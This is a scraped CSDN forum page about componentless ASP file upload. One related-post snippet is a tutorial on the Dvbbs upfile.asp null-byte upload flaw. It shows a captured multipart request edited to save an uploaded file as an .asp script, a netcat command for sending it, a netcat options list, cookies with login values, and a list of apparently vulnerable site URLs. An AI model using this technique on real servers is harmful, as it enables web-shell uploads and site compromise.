CSDN论坛 > Web 开发 > ASP

无组件上传再次提示 [问题点数:100分,结帖人xuen30]

Bbs1
本版专家分:37
结帖率 94.3%
CSDN今日推荐
Bbs5
本版专家分:2659
Bbs7
本版专家分:13265
Blank
黄花 2006年3月 PHP大版内专家分月排行榜第二
Blank
蓝花 2006年2月 PHP大版内专家分月排行榜第三
Bbs4
本版专家分:1774
Bbs4
本版专家分:1540
匿名用户不能发表回复!登录|注册
其他相关推荐
采用艾恩asp上传的角本
最近因一个小开发的需求,进行了Asp的文件上,在网上也看了不少的文章,多数都是将文件写入与文件上分开,另一方面就是写的不是很明确。而最终,我采用了艾恩asp上传的角本。这一点非常感谢艾恩的大力贡献,有需要的朋友,可以如下联系: '=========================================================  'Class: AnUpLoad  'Auth
asp 无组件上传大文件
在学习动易系统过程中,建立了一个简单的网站。在做上传文件测试时发现,系统无法上传大文件,提示出错信息:“quest 对象 错误 'ASP 0101 : 80004005”,后来在网上搜索,想从谷歌或百度找出答案,但答案无非都是关联到win2003经典的 “200KB” 大小上。     开始我也是这样认为,按照说明将MetaBase.xml中进行了相关设置:AspMaxRequestEn
asp无组件上传图片并生成缩略图
 先创建一文件夹,并创建虚拟目录或站长点。1.增加上传页xAdd.html无组件上传"POST" name="myform" action="xSave.asp" target="_self">"PicPath" type="text" id="PicPath" readonly="true">"sPicPath" type="hidden" id=
ASP无组件上传修改上传文件名方法
网上搜了很久没找到合适的,于是决定自己来修改,于是搞定了!!UploadClass类中属性p_AutoSave = 0默认为0,我们修改为p_AutoSave = 1大体意思是,值为0或2 时    文件名称为系统时间格式,如201202010.jpg                     值为其他数值,文件名称为原来默认文件名!找到这一行,大概意思是保存文件至      路径&文件名binIt
6行代码实现ASP无组件上传
目前有很多无组件上传类,我大概看了一下,大多写的相当复杂,有的居然还只能传文本,最关键的是没有10行代码以下的:),我花了一个晚上时间研究了一下ADODB.Stream,并且用了6行代码实现了无组件上传: upload.asp 文件代码 使用方法 在浏览器里面输入: http://xxx/upload.asp?fn=c:/上传文件/123.gif 其中xxx为你的网站域名地址,比如:www.jzxue.com 执行完后你会看到你的目录下面多了一个zslogo.gif,就是你刚才上传的文件拉!
解决稻香老农无组件上传类在文件上传时当文件名中含中文单双引号取不到正确的文件名的方案
今天完成了对稻香老农的最新版本无组件上传类V2.1的修改。解决了文件上传时当文件名中含中文单双引号取不到正确的文件名的问题。参考了无惧上传类,在此感谢稻香老农和梁无惧两位老师,谢谢他们无偿的奉献了自己的源码。下面附上修改后的代码: dim Data_5xsoftClass upload_5xsoft dim objForm,objFil
ASP无组件上传带进度条(源码+实例)
ASP无组件上传带进度条 可上传大文件(源码+实例)
先锋无组件上传类(无惧2.0杜绝上传漏洞修改版) v2004
上传漏洞终结篇 一、写在前面 ***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本*** NC(Netcat)   用于提交数据包   DOS界面下运行:   NC -vv www.***.com 80<1.txt   -vv: 回显   80: www端口   1.txt: 就是你要发送的数据包  (更多使用方法请查看本区的帖子) WSE(WSockExpert)   对本机端口的监视,抓取IE提交的数据包  (不会用的就自己到网上搜资料N多) 二、漏洞原理 下面例子假设的前提 www主机: www.***.com; bbs路径 : /bbs/ 漏洞源于对动网上传文件的研究,建议有一定编程经验的 看看Dvbbs的upfile.asp文件,没有必要全部看懂 upfile是通过生成一个form表上传,如下 <form name="form" method="post" action="upfile.asp" ...> <input type="hidden" name="filepath" value="uploadFace"> <input type="hidden" name="act" value="upload"> <input type="file" name="file1"> <input type="hidden" name="fname"> <input type="submit" name="Submit" value="上传" ...></form> 用到的变量: filepath 默认值uploadface 属性hiden act   默认值upload   属性hiden file1  就是你要传的那个文件 关键是 filepath 这个变量! 默认情况下我们的文件上传到www.***.com/bbs/uploadface/ 文件是用你的上传时间命名的,就是upfile里的这一句 FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&FileExt ------------------------------------------------------------------------- 我们知道计算机里面的数据是一"\0"为标致的用过C语言的都知道 char data[]="bbs" 这个data数组长度是4: b b s \0 如果我们构造filepath如下,会怎么样呢? filepath="/newmm.asp\0" 我们在2004.09.24.08.24传的文件就会发生变化 没有改时: http://www.***.com/bbs/uploadface/200409240824.jpg 用我们构造的filepath时: http://www.***.com/newmm.asp\0/200409240824.jpg 这样当服务器接收filepath数据时,检测到newmm.asp后面的\0 就理解为filepath的数据就结束了 这样我们上传的文件,比如c:\1.asp 就保存成: http://www.***.com/newmm.asp 三、后期补充 漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行 有很多网站只是加了N个hiden属性的变量对付网上公布的upfile.exe就是那个 上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。。 而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具 自己改WSE抓到的包里的filepath变量,然后在用NC提交。。。 就算他加N个hiden变量也于事无补。 当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结 就是我们的新理论诞生的时候! 四、漏洞列表 http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5369http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5530http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5531http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5693http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5731http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5746 监听外部主机     NC [-options] hostname port[s] [ports] ... 监听本地主机     NC -l -p port [options] [hostname] [port] options:     -d       detach from console, stealth mode     -e prog     inbound program to exec [dangerous!!]     -g gateway   source-routing hop point[s], up to 8     -G num     source-routing pointer: 4, 8, 12, ...     -h       this cruft     -i secs     delay interval for lines sent, ports scanned     -l       listen mode, for inbound connects     -L       listen harder, re-listen on socket close     -n       numeric-only IP addresses, no DNS     -o file     hex dump of traffic     -p port     local port number     -r       randomize local and remote ports     -s addr     local source address     -t       answer TELNET negotiation     -u       UDP mode     -v       verbose [use twice to be more verbose]     -w secs     timeout for connects and final net reads     -z       zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] 详细实例: --------------------------------------------------------------------------------- 一、WSE抓包结果(存到1.txt里): POST /bbs/upPhoto/upfile.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.xin126.com/bbs/upPhoto/upload.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Host: www.xin126.com Content-Length: 1969 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84 -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" ../medias/myPhoto/ -----------------------------7d423a138d0278 ... ... 上传 -----------------------------7d423a138d0278-- --------------------------------------------------------------------------------- 二、UltraEdit打开1.txt改数据: ...... -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" /newmm.asp█         <===这个黑色代表一个空格是 0x20,改成0x00就可以了 ...... --------------------------------------------------------------------------------- 三、重新计算cookies长度,然后nc提交 Nc -vv www.xin126.com 80 <1.txt UltraEdit是一个16位编辑器网上可以下载得到 我们主要用来写那个结束标致: \0 ====>16位表示:0x00或者00H 其实你改的时候就直接再filepath的结尾处加个00就OK了 计算cookies长度===>你把fillepath改了之后、肯定是或+或—cookies的长度变了 ...... Host: www.xin126.com Content-Length: 1969 <======就是这个 Connection: Keep-Alive Cache-Control: no-cache ...... 计算会吧?一个字母、数字就是1 对于上传漏洞提出的解决思路:(仅供参考) 1、一般的上传是把上传路径作为一个变量来处理 ===>我们的对策就是把filepath变成常量。。。 这个方法是目前最有效的(我认为的) 2、加强对于\0的处理,原来我们是读到这里就结束 我们继续读直道下一个变量开始的地方,处理就OK了
无组件上传类.比如无惧上传类
http://hi.baidu.com/wizweb/blog/item/23b3aa0395444c8ad43f7c36.html
asp图片上传(无组件版)_dreamweaver cs4插件
asp图片上传(无组件版)1.1.0 在asp中您可以上传图片到指定的路径,并在原页面预览显示上传后的图片,Dreamweaver 8.0以上版本适用。 插件中使用的上传类为 风声 ASP 无组件上传类 V2.11 jquery 为 1.2.3 thickbox 为 3.1 详细介绍: http://www.firste.cn/form/dw_down.php?dwid=5 请大家及时到我的网站报告bug,在此先表示感谢! ----------------------------------------- 验证表单在线制作 http://www.firste.cn 意见提交网址:http://www.firste.cn/form/suggest.php QQ:272984023 -----------------------------------------
关闭